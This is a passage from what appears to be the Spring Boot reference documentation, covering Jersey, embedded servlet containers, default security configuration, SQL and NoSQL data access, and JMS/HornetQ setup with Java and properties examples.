behaviour by setting `com.ibm.ws.webcontainer.invokeFlushAfterService` to `false`.


[[boot-features-jersey]]
=== JAX-RS and Jersey
If you prefer the JAX-RS programming model for REST endpoints you can use one of the
available implementations instead of Spring MVC. Jersey 1.x and Apache CXF work
quite well out of the box if you just register their `Servlet` or `Filter` as a
`@Bean` in your application context. Jersey 2.x has some native Spring support so
we also provide auto-configuration support for it in Spring Boot together with a
starter.

To get started with Jersey 2.x just include the `spring-boot-starter-jersey` as a
dependency and then you need one `@Bean` of type `ResourceConfig` in which you register
all the endpoints:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Component
	public class JerseyConfig extends ResourceConfig {

		public JerseyConfig() {
			register(Endpoint.class);
		}

	}
----

All the registered endpoints should be `@Components` with HTTP resource annotations
(`@GET` etc.), e.g.

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Component
	@Path("/hello")
	public class Endpoint {

		@GET
		public String message() {
			return "Hello";
		}

	}
----

Since the `Endpoint` is a Spring `@Component` its lifecycle is managed by Spring and you
can use `@Autowired` to inject dependencies and `@Value` to inject external configuration.
The Jersey servlet will be registered and mapped to '`+/*+`' by default. You can change
the mapping by adding `@ApplicationPath` to your `ResourceConfig`.

There is a {github-code}/spring-boot-samples/spring-boot-sample-jersey[Jersey sample] so
you can see how to set things up. There is also a
{github-code}/spring-boot-samples/spring-boot-sample-jersey1[Jersey 1.x sample].
Note that in the Jersey 1.x sample the spring-boot maven plugin has been configured to
unpack some Jersey jars so they can be scanned by the JAX-RS implementation (the sample
asks for them to be scanned in its `Filter` registration).


[[boot-features-embedded-container]]
=== Embedded servlet container support
Spring Boot includes support for embedded Tomcat and Jetty servers. Most developers will
simply use the appropriate '`Starter POM`' to obtain a fully configured instance. By
default both Tomcat and Jetty will listen for HTTP requests on port `8080`.



[[boot-features-embedded-container-servlets-and-filters]]
==== Servlets and Filters
When using an embedded servlet container you can register Servlets and Filters directly as
Spring beans. This can be particularly convenient if you want to refer to a value from
your `application.properties` during configuration.

By default, if the context contains only a single Servlet it will be mapped to `/`. In
the case of multiple Servlet beans the bean name will be used as a path prefix. Filters
will map to `+/*+`.

If convention-based mapping is not flexible enough you can use the
`ServletRegistrationBean` and `FilterRegistrationBean` classes for complete control. You
can also register items directly if your bean implements the `ServletContextInitializer`
interface.
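
For example, a sketch that maps a filter to an explicit URL pattern (the `MyFilter` class
and `/api/*` pattern are illustrative):

[source,java,indent=0]
----
	import org.springframework.boot.context.embedded.FilterRegistrationBean;
	import org.springframework.context.annotation.Bean;
	import org.springframework.context.annotation.Configuration;

	@Configuration
	public class FilterConfiguration {

		@Bean
		public FilterRegistrationBean myFilterRegistration() {
			// Register MyFilter only for /api/* instead of the default /*
			FilterRegistrationBean registration = new FilterRegistrationBean(new MyFilter());
			registration.addUrlPatterns("/api/*");
			return registration;
		}

	}
----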


[[boot-features-embedded-container-application-context]]
==== The EmbeddedWebApplicationContext
Under the hood Spring Boot uses a new type of `ApplicationContext` for embedded
servlet container support. The `EmbeddedWebApplicationContext` is a special
type of `WebApplicationContext` that bootstraps itself by searching for a single
`EmbeddedServletContainerFactory` bean. Usually a `TomcatEmbeddedServletContainerFactory`
or `JettyEmbeddedServletContainerFactory` will have been auto-configured.

NOTE: You usually won't need to be aware of these implementation classes. Most
applications will be auto-configured and the appropriate `ApplicationContext` and
`EmbeddedServletContainerFactory` will be created on your behalf.



[[boot-features-customizing-embedded-containers]]
==== Customizing embedded servlet containers
Common servlet container settings can be configured using Spring `Environment`
properties. Usually you would define the properties in your `application.properties`
file.

Common server settings include:

* `server.port` -- The listen port for incoming HTTP requests.
* `server.address` -- The interface address to bind to.
* `server.sessionTimeout` -- The session timeout (in seconds).

See the {sc-spring-boot-autoconfigure}/web/ServerProperties.{sc-ext}[`ServerProperties`]
class for a complete list.
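
For example, a sketch of `application.properties` entries (the values are illustrative):

[source,properties,indent=0]
----
	server.port=9000
	server.address=127.0.0.1
	server.sessionTimeout=1800
----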


[[boot-features-programmatic-embedded-container-customization]]
===== Programmatic customization
If you need to configure your embedded servlet container programmatically you can register
a Spring bean that implements the `EmbeddedServletContainerCustomizer` interface.
`EmbeddedServletContainerCustomizer` provides access to the
`ConfigurableEmbeddedServletContainer` which includes numerous customization setter
methods.

[source,java,indent=0]
----
	import org.springframework.boot.context.embedded.*;
	import org.springframework.stereotype.Component;

	@Component
	public class CustomizationBean implements EmbeddedServletContainerCustomizer {

		@Override
		public void customize(ConfigurableEmbeddedServletContainer container) {
			container.setPort(9000);
		}

	}
----



[[boot-features-customizing-configurableembeddedservletcontainerfactory-directly]]
===== Customizing ConfigurableEmbeddedServletContainer directly
If the above customization techniques are too limited, you can register the
`TomcatEmbeddedServletContainerFactory` or `JettyEmbeddedServletContainerFactory` bean
yourself.

[source,java,indent=0]
----
	@Bean
	public EmbeddedServletContainerFactory servletContainer() {
		TomcatEmbeddedServletContainerFactory factory = new TomcatEmbeddedServletContainerFactory();
		factory.setPort(9000);
		factory.setSessionTimeout(10, TimeUnit.MINUTES);
		factory.addErrorPages(new ErrorPage(HttpStatus.NOT_FOUND, "/notfound.html"));
		return factory;
	}
----

Setters are provided for many configuration options. Several protected method
'`hooks`' are also provided should you need to do something more exotic. See the
source code documentation for details.



[[boot-features-jsp-limitations]]
==== JSP limitations
When running a Spring Boot application that uses an embedded servlet container (and is
packaged as an executable archive), there are some limitations in the JSP support.

* With Tomcat it should work if you use war packaging, i.e. an executable war will work,
  and will also be deployable to a standard container (not limited to, but including
  Tomcat). An executable jar will not work because of a hard coded file pattern in Tomcat.

* Jetty does not currently work as an embedded container with JSPs.

There is a {github-code}/spring-boot-samples/spring-boot-sample-web-jsp[JSP sample] so
you can see how to set things up.



[[boot-features-security]]
== Security
If Spring Security is on the classpath then web applications will be secure by default
with '`basic`' authentication on all HTTP endpoints. To add method-level security to a web
application you can also add `@EnableGlobalMethodSecurity` with your desired settings.
Additional information can be found in the {spring-security-reference}#jc-method[Spring
Security Reference].

The default `AuthenticationManager` has a single user ('`user`' username and random
password, printed at INFO level when the application starts up):

[indent=0]
----
	Using default security password: 78fa095d-3f4c-48b1-ad50-e24c31d5cf35
----

You can change the password by providing a `security.user.password`. This and other
useful properties are externalized via
{sc-spring-boot-autoconfigure}/security/SecurityProperties.{sc-ext}[`SecurityProperties`]
(properties prefix "security").

The default security configuration is implemented in `SecurityAutoConfiguration` and in
the classes imported from there (`SpringBootWebSecurityConfiguration` for web security
and `AuthenticationManagerConfiguration` for authentication configuration, which is also
relevant in non-web applications). To switch off the Boot default configuration
completely in a web application you can add a bean with `@EnableWebSecurity`. To customize
it you normally use external properties and beans of type `WebSecurityConfigurerAdapter`
(e.g. to add form-based login). There are several secure applications in the
{github-code}/spring-boot-samples/[Spring Boot samples] to get you started with common
use cases.

The basic features you get out of the box in a web application are:

* An `AuthenticationManager` bean with in-memory store and a single user (see
  `SecurityProperties.User` for the properties of the user).
* Ignored (unsecure) paths for common static resource locations (`+/css/**+`, `+/js/**+`,
  `+/images/**+` and `+**/favicon.ico+`).
* HTTP Basic security for all other endpoints.
* Security events published to Spring's `ApplicationEventPublisher` (successful and
  unsuccessful authentication and access denied).
* Common low-level features (HSTS, XSS, CSRF, caching) provided by Spring Security are
  on by default.

All of the above can be switched on and off or modified using external properties
(`+security.*+`). To override the access rules without changing any other autoconfigured
features add a `@Bean` of type `WebSecurityConfigurerAdapter` with
`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)`.
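
For example, a sketch that opens up a hypothetical `/public/**` path while keeping HTTP
Basic security for everything else:

[source,java,indent=0]
----
	import org.springframework.boot.autoconfigure.security.SecurityProperties;
	import org.springframework.context.annotation.Configuration;
	import org.springframework.core.annotation.Order;
	import org.springframework.security.config.annotation.web.builders.HttpSecurity;
	import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;

	@Configuration
	@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)
	public class ApplicationSecurity extends WebSecurityConfigurerAdapter {

		@Override
		protected void configure(HttpSecurity http) throws Exception {
			// Permit '/public/**' and require authentication everywhere else
			http.authorizeRequests()
					.antMatchers("/public/**").permitAll()
					.anyRequest().authenticated()
					.and().httpBasic();
		}

	}
----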
\n\n\n[[boot-features-sql]]\n== Working with SQL databases\nThe Spring Framework provides extensive support for working with SQL databases, from\ndirect JDBC access using `JdbcTemplate` to complete '`object relational mapping`'\ntechnologies such as Hibernate. Spring Data provides an additional level of functionality,\ncreating `Repository` implementations directly from interfaces and using conventions to\ngenerate queries from your method names.\n\n\n\n[[boot-features-configure-datasource]]\n=== Configure a DataSource\nJava's `javax.sql.DataSource` interface provides a standard method of working with\ndatabase connections. Traditionally a DataSource uses a `URL` along with some\ncredentials to establish a database connection.\n\n\n\n[[boot-features-embedded-database-support]]\n==== Embedded Database Support\nIt's often convenient to develop applications using an in-memory embedded database.\nObviously, in-memory databases do not provide persistent storage; you will need to\npopulate your database when your application starts and be prepared to throw away\ndata when your application ends.\n\nTIP: The '`How-to`' section includes a '<<howto.adoc#howto-database-initialization, section\non how to initialize a database>>'.\n\nSpring Boot can auto-configure embedded http:\/\/www.h2database.com[H2],\nhttp:\/\/hsqldb.org\/[HSQL] and http:\/\/db.apache.org\/derby\/[Derby] databases. You don't\nneed to provide any connection URLs; simply include a build dependency to the\nembedded database that you want to use.\n\nFor example, typical POM dependencies would be:\n\n[source,xml,indent=0]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-jpa<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.hsqldb<\/groupId>\n\t\t<artifactId>hsqldb<\/artifactId>\n\t\t<scope>runtime<\/scope>\n\t<\/dependency>\n----\n\nNOTE: You need a dependency on `spring-jdbc` for an embedded database to be\nauto-configured. In this example it's pulled in transitively via\n`spring-boot-starter-data-jpa`.\n\n\n\n[[boot-features-connect-to-production-database]]\n==== Connection to a production database\nProduction database connections can also be auto-configured using a pooling\n`DataSource`. Here's the algorithm for choosing a specific implementation:\n\n* We prefer the Tomcat pooling `DataSource` for its performance and concurrency, so if\n that is available we always choose it.\n* Otherwise, if HikariCP is available we will use it.\n* If Commons DBCP is available we will use it, but we don't recommend it in production.\n* Lastly, if Commons DBCP2 is available we will use it.\n\nIf you use the `spring-boot-starter-jdbc` or `spring-boot-starter-data-jpa`\n'`starter POMs`' you will automatically get a dependency to `tomcat-jdbc`.\n\nNOTE: Additional connection pools can always be configured manually. If you define your\nown `DataSource` bean, auto-configuration will not occur.\n\nDataSource configuration is controlled by external configuration properties in\n`+spring.datasource.*+`. For example, you might declare the following section\nin `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tspring.datasource.username=dbuser\n\tspring.datasource.password=dbpass\n\tspring.datasource.driver-class-name=com.mysql.jdbc.Driver\n----\n\nSee {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[`DataSourceProperties`]\nfor more of the supported options.\n\nTIP: You often won't need to specify the `driver-class-name` since Spring Boot can deduce\nit for most databases from the `url`.\n\nNOTE: For a pooling `DataSource` to be created we need to be able to verify that a valid\n`Driver` class is available, so we check for that before doing anything, i.e. if you set\n`spring.datasource.driverClassName=com.mysql.jdbc.Driver` then that class has to be\nloadable.\n
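\nYou can also tune the pool itself through `+spring.datasource.*+` properties; a hedged\nsketch (exactly which settings apply depends on the pool implementation in use):\n\n[source,properties,indent=0]\n----\n\tspring.datasource.max-active=50\n\tspring.datasource.max-idle=8\n\tspring.datasource.min-idle=8\n----\n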
\n\n\n[[boot-features-connecting-to-a-jndi-datasource]]\n==== Connection to a JNDI DataSource\nIf you are deploying your Spring Boot application to an Application Server you might want\nto configure and manage your DataSource using your Application Server's built-in features\nand access it using JNDI.\n\nThe `spring.datasource.jndi-name` property can be used as an alternative to the\n`spring.datasource.url`, `spring.datasource.username` and `spring.datasource.password`\nproperties to access the `DataSource` from a specific JNDI location. For example, the\nfollowing section in `application.properties` shows how you can access a JBoss AS defined\n`DataSource`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.jndi-name=java:jboss\/datasources\/customers\n----\n\n\n\n[[boot-features-using-jdbc-template]]\n=== Using JdbcTemplate\nSpring's `JdbcTemplate` and `NamedParameterJdbcTemplate` classes are auto-configured and\nyou can `@Autowire` them directly into your own beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jdbc.core.JdbcTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JdbcTemplate jdbcTemplate) {\n\t\t\tthis.jdbcTemplate = jdbcTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n
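\nOnce injected, the template can run queries directly; a trivial sketch (the table name is\nillustrative):\n\n[source,java,indent=0]\n----\n\t\/\/ e.g. inside a method of the bean above\n\tInteger count = this.jdbcTemplate.queryForObject(\n\t\t\t\"SELECT COUNT(*) FROM CITY\", Integer.class);\n----\n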
\n\n\n[[boot-features-jpa-and-spring-data]]\n=== JPA and '`Spring Data`'\nThe Java Persistence API is a standard technology that allows you to '`map`' objects to\nrelational databases. The `spring-boot-starter-data-jpa` POM provides a quick way to get\nstarted. It provides the following key dependencies:\n\n* Hibernate -- One of the most popular JPA implementations.\n* Spring Data JPA -- Makes it easy to implement JPA-based repositories.\n* Spring ORMs -- Core ORM support from the Spring Framework.\n\nTIP: We won't go into too many details of JPA or Spring Data here. You can follow the\nhttp:\/\/spring.io\/guides\/gs\/accessing-data-jpa\/['`Accessing Data with JPA`'] guide from\nhttp:\/\/spring.io and read the http:\/\/projects.spring.io\/spring-data-jpa\/[Spring Data JPA]\nand http:\/\/hibernate.org\/orm\/documentation\/[Hibernate] reference documentation.\n\n\n\n[[boot-features-entity-classes]]\n==== Entity Classes\nTraditionally, JPA '`Entity`' classes are specified in a `persistence.xml` file. With\nSpring Boot this file is not necessary and instead '`Entity Scanning`' is used. By\ndefault all packages below your main configuration class (the one annotated with\n`@EnableAutoConfiguration`) will be searched.\n\nAny classes annotated with `@Entity`, `@Embeddable` or `@MappedSuperclass` will be\nconsidered. A typical entity class would look something like this:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport java.io.Serializable;\n\timport javax.persistence.*;\n\n\t@Entity\n\tpublic class City implements Serializable {\n\n\t\t@Id\n\t\t@GeneratedValue\n\t\tprivate Long id;\n\n\t\t@Column(nullable = false)\n\t\tprivate String name;\n\n\t\t@Column(nullable = false)\n\t\tprivate String state;\n\n\t\t\/\/ ... additional members, often include @OneToMany mappings\n\n\t\tprotected City() {\n\t\t\t\/\/ no-args constructor required by JPA spec\n\t\t\t\/\/ this one is protected since it shouldn't be used directly\n\t\t}\n\n\t\tpublic City(String name, String state) {\n\t\t\tthis.name = name;\n\t\t\tthis.state = state;\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn this.name;\n\t\t}\n\n\t\tpublic String getState() {\n\t\t\treturn this.state;\n\t\t}\n\n\t\t\/\/ ... etc\n\n\t}\n----\n\nTIP: You can customize entity scanning locations using the `@EntityScan` annotation.\nSee the '<<howto.adoc#howto-separate-entity-definitions-from-spring-configuration>>'\nhow-to.\n\n\n[[boot-features-spring-data-jpa-repositories]]\n==== Spring Data JPA Repositories\nSpring Data JPA repositories are interfaces that you can define to access data. JPA\nqueries are created automatically from your method names. For example, a `CityRepository`\ninterface might declare a `findAllByState(String state)` method to find all cities\nin a given state.\n\nFor more complex queries you can annotate your method using Spring Data's\n{spring-data-javadoc}\/repository\/Query.html[`Query`] annotation.\n\nSpring Data repositories usually extend from the\n{spring-data-commons-javadoc}\/repository\/Repository.html[`Repository`] or\n{spring-data-commons-javadoc}\/repository\/CrudRepository.html[`CrudRepository`] interfaces. If you are using\nauto-configuration, repositories will be searched from the package containing your\nmain configuration class (the one annotated with `@EnableAutoConfiguration`) down.\n\nHere is a typical Spring Data repository:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndStateAllIgnoringCase(String name, String state);\n\n\t}\n----\n\nTIP: We have barely scratched the surface of Spring Data JPA. For complete details check\ntheir http:\/\/projects.spring.io\/spring-data-jpa\/[reference documentation].\n\n\n\n[[boot-features-creating-and-dropping-jpa-databases]]\n==== Creating and dropping JPA databases\nBy default JPA databases will be automatically created *only* if you use an embedded\ndatabase (H2, HSQL or Derby). You can explicitly configure JPA settings using\n`+spring.jpa.*+` properties. For example, to create and drop tables you can add the\nfollowing to your `application.properties`.\n\n[indent=0]\n----\n\tspring.jpa.hibernate.ddl-auto=create-drop\n----\n\nNOTE: Hibernate's own internal property name for this (if you happen to remember it\nbetter) is `hibernate.hbm2ddl.auto`. You can set it, along with other Hibernate native\nproperties, using `+spring.jpa.properties.*+` (the prefix is stripped before adding them\nto the entity manager). Example:\n\n[indent=0]\n----\n\tspring.jpa.properties.hibernate.globally_quoted_identifiers=true\n----\n\npasses `hibernate.globally_quoted_identifiers` to the Hibernate entity manager.\n\nBy default the DDL execution (or validation) is deferred until\nthe `ApplicationContext` has started. There is also a `spring.jpa.generate-ddl` flag, but\nit is not used if Hibernate auto-configuration is active because the `ddl-auto`\nsettings are more fine-grained.\n
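\nA couple of other commonly used `+spring.jpa.*+` settings, shown here as a hedged example:\n\n[source,properties,indent=0]\n----\n\tspring.jpa.show-sql=true\n\tspring.jpa.database-platform=org.hibernate.dialect.MySQL5Dialect\n----\n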
\n\n\n[[boot-features-nosql]]\n== Working with NoSQL technologies\nSpring Data provides additional projects that help you access a variety of NoSQL\ntechnologies including\nhttp:\/\/projects.spring.io\/spring-data-mongodb\/[MongoDB],\nhttp:\/\/projects.spring.io\/spring-data-neo4j\/[Neo4J],\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch\/[Elasticsearch],\nhttp:\/\/projects.spring.io\/spring-data-solr\/[Solr],\nhttp:\/\/projects.spring.io\/spring-data-redis\/[Redis],\nhttp:\/\/projects.spring.io\/spring-data-gemfire\/[Gemfire],\nhttp:\/\/projects.spring.io\/spring-data-couchbase\/[Couchbase] and\nhttp:\/\/projects.spring.io\/spring-data-cassandra\/[Cassandra].\nSpring Boot provides auto-configuration for Redis, MongoDB, Elasticsearch, Solr and\nGemfire; you can make use of the other projects, but you will need to configure them\nyourself. Refer to the appropriate reference documentation at\nhttp:\/\/projects.spring.io\/spring-data[projects.spring.io\/spring-data].\n\n\n\n[[boot-features-redis]]\n=== Redis\nhttp:\/\/redis.io\/[Redis] is a cache, message broker and richly-featured key-value store.\nSpring Boot offers basic auto-configuration for the https:\/\/github.com\/xetorthio\/jedis\/[Jedis]\nclient library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-redis[Spring Data Redis]. There is a\n`spring-boot-starter-redis` '`Starter POM`' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-redis]]\n==== Connecting to Redis\nYou can inject an auto-configured `RedisConnectionFactory`, `StringRedisTemplate` or\nvanilla `RedisTemplate` instance as you would any other Spring Bean. By default the\ninstance will attempt to connect to a Redis server using `localhost:6379`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate StringRedisTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(StringRedisTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of any of the auto-configured types it will replace the\ndefault (except in the case of `RedisTemplate`, where the exclusion is based on the bean\nname '`redisTemplate`', not its type). If `commons-pool2` is on the classpath you will get\na pooled connection factory by default.\n\n\n\n[[boot-features-mongodb]]\n=== MongoDB\nhttp:\/\/www.mongodb.com\/[MongoDB] is an open-source NoSQL document database that uses a\nJSON-like schema instead of traditional table-based relational data. Spring Boot offers\nseveral conveniences for working with MongoDB, including the\n`spring-boot-starter-data-mongodb` '`Starter POM`'.\n\n\n\n[[boot-features-connecting-to-mongodb]]\n==== Connecting to a MongoDB database\nYou can inject an auto-configured `com.mongodb.Mongo` instance as you would any other\nSpring Bean. By default the instance will attempt to connect to a MongoDB server using\nthe URL `mongodb:\/\/localhost\/test`:\n\n[source,java,indent=0]\n----\n\timport com.mongodb.Mongo;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final Mongo mongo;\n\n\t\t@Autowired\n\t\tpublic MyBean(Mongo mongo) {\n\t\t\tthis.mongo = mongo;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n
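\nThe injected `Mongo` instance gives you full access to the driver API; for example (the\ndatabase name is illustrative):\n\n[source,java,indent=0]\n----\n\t\/\/ obtain a database handle through the native driver API\n\tcom.mongodb.DB db = this.mongo.getDB(\"test\");\n----\n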
\nYou can set the `spring.data.mongodb.uri` property to change the URL, or alternatively\nspecify a `host`\/`port`. For example, you might declare the following in your\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.data.mongodb.host=mongoserver\n\tspring.data.mongodb.port=27017\n----\n\nTIP: If `spring.data.mongodb.port` is not specified the default of `27017` is used. You\ncould simply delete this line from the sample above.\n\nYou can also declare your own `Mongo` `@Bean` if you want to take complete control of\nestablishing the MongoDB connection.\n\n\n\n[[boot-features-mongo-template]]\n==== MongoTemplate\nSpring Data Mongo provides a {spring-data-mongo-javadoc}\/core\/MongoTemplate.html[`MongoTemplate`]\nclass that is very similar in its design to Spring's `JdbcTemplate`. As with\n`JdbcTemplate`, Spring Boot auto-configures a bean for you to simply inject:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.data.mongodb.core.MongoTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final MongoTemplate mongoTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(MongoTemplate mongoTemplate) {\n\t\t\tthis.mongoTemplate = mongoTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee the `MongoOperations` Javadoc for complete details.\n\n\n\n[[boot-features-spring-data-mongo-repositories]]\n==== Spring Data MongoDB repositories\nSpring Data includes repository support for MongoDB. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data MongoDB share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now a Mongo data class rather than a JPA `@Entity`, it will work in the\nsame way.\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndStateAllIgnoringCase(String name, String state);\n\n\t}\n----\n\nTIP: For complete details of Spring Data MongoDB, including its rich object mapping\ntechnologies, refer to their http:\/\/projects.spring.io\/spring-data-mongodb\/[reference\ndocumentation].\n\n\n\n[[boot-features-gemfire]]\n=== Gemfire\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire[Spring Data Gemfire] provides\nconvenient Spring-friendly tools for accessing the http:\/\/www.gopivotal.com\/big-data\/pivotal-gemfire#details[Pivotal Gemfire]\ndata management platform. There is a `spring-boot-starter-data-gemfire` '`Starter POM`'\nfor collecting the dependencies in a convenient way. There is currently no auto-configuration\nsupport for Gemfire, but you can enable Spring Data Repositories with a\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire\/blob\/master\/src\/main\/java\/org\/springframework\/data\/gemfire\/repository\/config\/EnableGemfireRepositories.java[single annotation].\n\n\n\n[[boot-features-solr]]\n=== Solr\nhttp:\/\/lucene.apache.org\/solr\/[Apache Solr] is a search engine. Spring Boot offers basic\nauto-configuration for the Solr client library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-solr[Spring Data Solr]. 
There is\na `spring-boot-starter-data-solr` '`Starter POM`' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-solr]]\n==== Connecting to Solr\nYou can inject an auto-configured `SolrServer` instance as you would any other Spring\nBean. By default the instance will attempt to connect to a server using\n`http:\/\/localhost:8983\/solr`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate SolrServer solr;\n\n\t\t@Autowired\n\t\tpublic MyBean(SolrServer solr) {\n\t\t\tthis.solr = solr;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `SolrServer` it will replace the default.\n\n\n\n[[boot-features-spring-data-solr-repositories]]\n==== Spring Data Solr repositories\nSpring Data includes repository support for Apache Solr. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Solr share the same common infrastructure;\nso you could take the JPA example from earlier and, assuming that `City` is now a\n`@SolrDocument` class rather than a JPA `@Entity`, it will work in the same way.\n
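\nFor illustration, the Solr version of the earlier repository might look like the following\nsketch (assuming a `String` id, as is usual for Solr documents):\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.repository.Repository;\n\n\tpublic interface CityRepository extends Repository<City, String> {\n\n\t\tCity findByNameAndStateAllIgnoringCase(String name, String state);\n\n\t}\n----\n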
\nTIP: For complete details of Spring Data Solr, refer to their\nhttp:\/\/projects.spring.io\/spring-data-solr\/[reference documentation].\n\n\n\n[[boot-features-elasticsearch]]\n=== Elasticsearch\nhttp:\/\/www.elasticsearch.org\/[Elasticsearch] is an open source, distributed,\nreal-time search and analytics engine. Spring Boot offers basic auto-configuration for\nElasticsearch and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch[Spring Data Elasticsearch].\nThere is a `spring-boot-starter-data-elasticsearch` '`Starter POM`' for collecting the\ndependencies in a convenient way.\n\n\n\n[[boot-features-connecting-to-elasticsearch]]\n==== Connecting to Elasticsearch\nYou can inject an auto-configured `ElasticsearchTemplate` or Elasticsearch `Client`\ninstance as you would any other Spring Bean. By default the instance will attempt to\nconnect to a local in-memory server (a `NodeClient` in Elasticsearch terms), but you can\nswitch to a remote server (i.e. a `TransportClient`) by setting\n`spring.data.elasticsearch.clusterNodes` to a comma-separated '`host:port`' list.\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate ElasticsearchTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(ElasticsearchTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `ElasticsearchTemplate` it will replace the\ndefault.\n\n\n\n[[boot-features-spring-data-elasticsearch-repositories]]\n==== Spring Data Elasticsearch repositories\nSpring Data includes repository support for Elasticsearch. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Elasticsearch share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now an Elasticsearch `@Document` class rather than a JPA `@Entity`, it will\nwork in the same way.\n\nTIP: For complete details of Spring Data Elasticsearch, refer to their\nhttp:\/\/docs.spring.io\/spring-data\/elasticsearch\/docs\/[reference documentation].\n\n\n\n[[boot-features-messaging]]\n== Messaging\nThe Spring Framework provides extensive support for integrating with messaging systems:\nfrom simplified use of the JMS API using `JmsTemplate` to a complete infrastructure to\nreceive messages asynchronously. Spring AMQP provides a similar feature set for the\n'`Advanced Message Queuing Protocol`' and Boot also provides auto-configuration options\nfor `RabbitTemplate` and RabbitMQ. There is also support for STOMP messaging natively\nin Spring Websocket and Spring Boot has support for that through starters and a small\namount of auto-configuration.\n\n\n\n[[boot-features-jms]]\n=== JMS\nThe `javax.jms.ConnectionFactory` interface provides a standard method of creating a\n`javax.jms.Connection` for interacting with a JMS broker. Although Spring needs a\n`ConnectionFactory` to work with JMS, you generally won't need to use it directly yourself\nand you can instead rely on higher level messaging abstractions (see the\n{spring-reference}\/#jms[relevant section] of the Spring Framework reference\ndocumentation for details). Spring Boot also auto-configures the necessary infrastructure\nto send and receive messages.\n\n\n\n[[boot-features-hornetq]]\n==== HornetQ support\nSpring Boot can auto-configure a `ConnectionFactory` when it detects that HornetQ is\navailable on the classpath. If the broker is present, an embedded broker is started and\nconfigured automatically (unless the mode property has been explicitly set). The supported\nmodes are: `embedded` (to make explicit that an embedded broker is required and should\nlead to an error if the broker is not available in the classpath), and `native` to\nconnect to a broker using the `netty` transport protocol. When the latter is\nconfigured, Spring Boot configures a `ConnectionFactory` connecting to a broker running\non the local machine with the default settings.\n\nNOTE: If you are using `spring-boot-starter-hornetq` the necessary dependencies to\nconnect to an existing HornetQ instance are provided, as well as the Spring infrastructure\nto integrate with JMS. Adding `org.hornetq:hornetq-jms-server` to your application allows\nyou to use the embedded mode.\n\nHornetQ configuration is controlled by external configuration properties in\n`+spring.hornetq.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.hornetq.mode=native\n\tspring.hornetq.host=192.168.1.210\n\tspring.hornetq.port=9876\n----\n
